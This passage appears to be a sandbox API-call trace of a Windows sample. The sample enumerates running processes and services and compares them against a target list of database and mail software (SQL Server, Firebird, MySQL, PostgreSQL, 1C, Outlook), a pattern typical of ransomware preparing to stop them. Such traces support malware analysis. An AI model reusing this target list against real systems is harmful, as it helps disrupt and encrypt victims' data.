th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0055.772] lstrlenW (lpString="VSSVC.exe") returned 9 [0055.772] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0055.773] lstrlenW (lpString="svchost.exe") returned 11 [0055.773] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0055.774] lstrlenW (lpString="LogonUI.exe") returned 11 [0055.774] Process32NextW (in: hSnapshot=0x20c, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 0 [0055.775] CloseHandle (hObject=0x20c) returned 1 [0055.775] Sleep (dwMilliseconds=0x1f4) [0056.506] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb90428 [0056.530] EnumServicesStatusExW (in: hSCManager=0xb90428, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 0 [0056.531] GetLastError () returned 0xea [0056.531] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x12c6) returned 0xbc83f8 [0056.531] EnumServicesStatusExW (in: hSCManager=0xb90428, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbc83f8, cbBufSize=0x12c6, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbc83f8, pcbBytesNeeded=0x282ff44, lpServicesReturned=0x282ff5c, lpResumeHandle=0x0) returned 1 [0056.532] CloseServiceHandle (hSCObject=0xb90428) returned 1 [0056.532] lstrlenW (lpString="Appinfo") returned 7 [0056.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0056.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0056.532] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0056.532] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0056.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0056.532] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0056.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0056.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0056.532] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0056.532] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0056.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0056.532] lstrlenW (lpString="AudioSrv") returned 8 [0056.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0056.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0056.532] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0056.532] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0056.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0056.532] lstrlenW (lpString="BFE") returned 3 [0056.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0056.532] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0056.532] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0056.532] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0056.532] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0056.532] lstrlenW (lpString="CryptSvc") returned 8 [0056.532] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0056.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0056.533] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0056.533] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0056.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0056.533] lstrlenW (lpString="CscService") returned 10 [0056.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0056.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0056.533] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0056.533] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0056.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0056.533] lstrlenW (lpString="DcomLaunch") returned 10 [0056.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0056.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0056.533] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0056.533] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0056.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0056.533] lstrlenW (lpString="Dhcp") returned 4 [0056.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0056.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0056.533] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0056.533] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0056.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0056.533] lstrlenW (lpString="Dnscache") returned 8 [0056.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0056.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0056.533] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0056.533] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0056.533] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0056.533] lstrlenW (lpString="DPS") returned 3 [0056.533] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0056.533] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0056.533] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0056.534] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0056.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0056.534] lstrlenW (lpString="eventlog") returned 8 [0056.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0056.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0056.534] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0056.534] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0056.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0056.534] lstrlenW (lpString="EventSystem") returned 11 [0056.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0056.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0056.534] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0056.534] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0056.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0056.534] lstrlenW (lpString="gpsvc") returned 5 [0056.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0056.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0056.534] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0056.534] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0056.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0056.534] lstrlenW (lpString="iphlpsvc") returned 8 [0056.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0056.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0056.534] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0056.534] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0056.534] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0056.534] lstrlenW (lpString="LanmanServer") returned 12 [0056.534] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0056.534] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0056.534] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0056.534] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0056.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0056.535] lstrlenW (lpString="LanmanWorkstation") returned 17 [0056.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0056.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0056.535] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0056.535] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0056.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0056.535] lstrlenW (lpString="lmhosts") returned 7 [0056.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0056.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0056.535] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0056.535] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0056.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0056.535] lstrlenW (lpString="MMCSS") returned 5 [0056.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0056.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0056.535] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0056.535] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0056.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0056.535] lstrlenW (lpString="MpsSvc") returned 6 [0056.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0056.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0056.535] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0056.535] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0056.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0056.535] lstrlenW (lpString="Netman") returned 6 [0056.535] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0056.535] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0056.535] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0056.535] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0056.535] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0056.535] lstrlenW (lpString="netprofm") returned 8 [0056.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0056.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0056.536] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0056.536] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0056.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0056.536] lstrlenW (lpString="NlaSvc") returned 6 [0056.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0056.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0056.536] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0056.536] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0056.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0056.536] lstrlenW (lpString="nsi") returned 3 [0056.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0056.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0056.536] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0056.536] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0056.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0056.536] lstrlenW (lpString="PcaSvc") returned 6 [0056.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0056.536] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0056.536] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0056.536] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0056.536] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0056.536] lstrlenW (lpString="PlugPlay") returned 8 [0056.536] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0056.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0056.537] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0056.537] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0056.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0056.537] lstrlenW (lpString="Power") returned 5 [0056.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0056.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0056.537] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0056.537] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0056.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0056.537] lstrlenW (lpString="ProfSvc") returned 7 [0056.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0056.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0056.537] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0056.537] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0056.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0056.537] lstrlenW (lpString="RpcEptMapper") returned 12 [0056.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0056.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0056.537] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0056.537] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0056.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0056.537] lstrlenW (lpString="RpcSs") returned 5 [0056.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0056.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0056.537] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0056.537] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0056.537] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0056.537] lstrlenW (lpString="SamSs") returned 5 [0056.537] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0056.537] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0056.537] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0056.538] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0056.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0056.538] lstrlenW (lpString="Schedule") returned 8 [0056.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0056.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0056.538] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0056.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0056.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0056.538] lstrlenW (lpString="SENS") returned 4 [0056.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0056.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0056.538] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0056.538] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0056.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0056.538] lstrlenW (lpString="ShellHWDetection") returned 16 [0056.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0056.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0056.538] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0056.538] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0056.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0056.538] lstrlenW (lpString="Spooler") returned 7 [0056.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0056.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0056.538] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0056.538] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0056.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0056.538] lstrlenW (lpString="swprv") returned 5 [0056.538] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0056.538] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0056.538] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0056.538] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0056.538] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0056.539] lstrlenW (lpString="SysMain") returned 7 [0056.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0056.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0056.539] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0056.539] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0056.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0056.539] lstrlenW (lpString="Themes") returned 6 [0056.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0056.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0056.539] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0056.539] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0056.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0056.539] lstrlenW (lpString="TrkWks") returned 6 [0056.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0056.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0056.539] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0056.539] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0056.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0056.539] lstrlenW (lpString="UxSms") returned 5 [0056.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0056.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0056.539] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0056.539] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0056.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0056.539] lstrlenW (lpString="VSS") returned 3 [0056.539] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0056.539] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0056.539] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0056.539] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0056.539] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0056.539] lstrlenW (lpString="WdiServiceHost") returned 14 [0056.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0056.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0056.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0056.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0056.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0056.540] lstrlenW (lpString="WdiSystemHost") returned 13 [0056.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0056.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0056.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0056.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0056.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0056.540] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0056.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0056.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0056.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0056.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0056.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0056.540] lstrlenW (lpString="Winmgmt") returned 7 [0056.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0056.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0056.540] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0056.540] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0056.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0056.540] lstrlenW (lpString="WPDBusEnum") returned 10 [0056.540] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0056.540] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0056.540] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0056.540] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0056.540] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0056.540] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0056.540] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x230 [0056.545] Process32FirstW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.546] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.547] lstrlenW (lpString="System") returned 6 [0056.547] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0056.547] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0056.547] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0056.547] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0056.547] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0056.547] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0056.547] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0056.547] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.548] lstrlenW (lpString="smss.exe") returned 8 [0056.548] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0056.548] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0056.548] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0056.548] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0056.548] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0056.548] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0056.548] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0056.548] Process32NextW (in: hSnapshot=0x230, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0056.549] lstrlenW (lpString="csrss.exe") returned 9 [0056.549] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0056.549] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0056.549] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 